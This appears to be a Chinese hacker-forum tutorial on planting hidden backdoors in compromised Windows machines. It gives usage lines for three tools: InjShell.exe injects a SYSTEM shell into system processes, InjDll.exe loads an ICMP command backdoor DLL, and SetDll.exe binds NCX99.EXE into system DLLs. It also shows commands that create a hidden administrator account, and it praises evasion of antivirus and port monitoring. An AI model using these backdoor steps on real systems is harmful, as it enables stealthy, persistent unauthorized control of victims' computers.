作者:poison 文章来源:hackfree.net
木马用了n年了, 加壳讨论了n久了,却依然要为这些事情而苦恼. 不过最近我发现了几款好的后门,
属于内核级的, 跟大家一起来分享一下.
1.在系统进程中插入SHELL 工具: InjShell.exe
这个是在线程中插入到shell的, 用法相对与另外两个后门要简单多了.
先用pslist查看进程, 需要我们注意的是, 这里我们插入的线程应该是系统进程, 而不是任意一个
进程, 如 internat.exe svchost.exe conime.exe. 这些进程都可以的, 用法是这样的:
InjShell.exe 插入的进程名 端口
比如InjShell.exe internat.exe 7788
一个进程不 成功, 可以换个来
成功后成功后 telnet ip 7788
就可以得到一个SYSTEM的 SHELL !怎么样?爽吧?
还有就是关于telnet的这个端口的问题,我曾经想过, 如果我用80 端口呢?能telnet上吗?
事实上我没有这样实验过, 我请教过几个朋友,他们的回答是:应该可以, 但是你浏览网页将
变的非常缓慢.!@#$%^&*(), 如果是这样,我可不打算telnet 80 了, 有实验过的朋友, 告诉我吧
这个由于是由于是系统进程所以很难被发现,也不会被查杀, 可以随系统启动
2.在系统进程插入DLL 工具:InjDll.exe IcmpAttach.dll IcmpReplySend.exe
首先我们来认识一下, 什么叫DLL
DLL是Dynamic Link Library的缩写,意为动态链接库。在Windows中,许多应用程序并不是一个
完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件,放置于系统中。
当我们执行某一个程序时,相应的DLL文件就会被调用。一个应用程序可有多个DLL文件,一个DLL文件也可能被几个应用程序所共用,这样的DLL文件被称为共享DLL文件。DLL文件一般被存放在C:WindowsSystem目录下。
现在我们开始操作,先在肉鸡上
InjDll.exe 插入的进程名 IcmpAttach.dll(我们后门DLL的名字)
然后用客户端IcmpReplySend.exe IP CMD
CMD的含义是命令提示符下要输入的命令, 比如:
IcmpReplySend.exe 127.0.0.1 "net user IUSR_Machinename 7788 /add"
IcmpReplySend.exe 127.0.0.1 "net localgroup administrators IUSR_Machinename /add"
注意,这里的命令都要用引号引起来, 命令的大概含义上是添加了一个用户IUSR_Machinename 并且
把他加入了管理组.这样我们随时可以远程执行命令(SYSTEM权限的)并且是采用ICMP通讯,不开PORT,
安全,也更加隐密了.不开端口而可以进行远程操作的后门, 幸福吗?
3.在DLL中插入EXE 工具:SetDll.exe NCX99.EXE
用法:SetDll.exe <ExeName> <DllName>
SetDll.exe NCX99.EXE 系统进程必须的dll文件
系统进程必须的dll文件, 例如NTDLL.DLL等等
然后然后telnet ip 99
注意:由于我们用的是NCX99.EXE,所以当然要telnet99 了
这样即使你用fport来查看,NCX99.EXE也不会出现在进程中
请注意前3个后门的区别, 一个是在进程中插入shell, 另外一个是在 进程中插入dll,还有一个是在
dll中插入exe文件,到底他们有什么不同呢?
在进程中插入shell, 这样进程中不会出现我们这个后门,下次telnet他就很容易了;
在系统进程插入DLL, 这个是我觉得最牢靠的后门办法了, 不开端口, 对方也看不见你的进程,
而你可以在远程执行命令, 真的很爽~
最后一个, 在DLL中插入EXE, 和第一个有异曲同工之处~
其实好后门还很多, 今天就先介绍到这里吧~~~
(出处:http://www.sheup.com)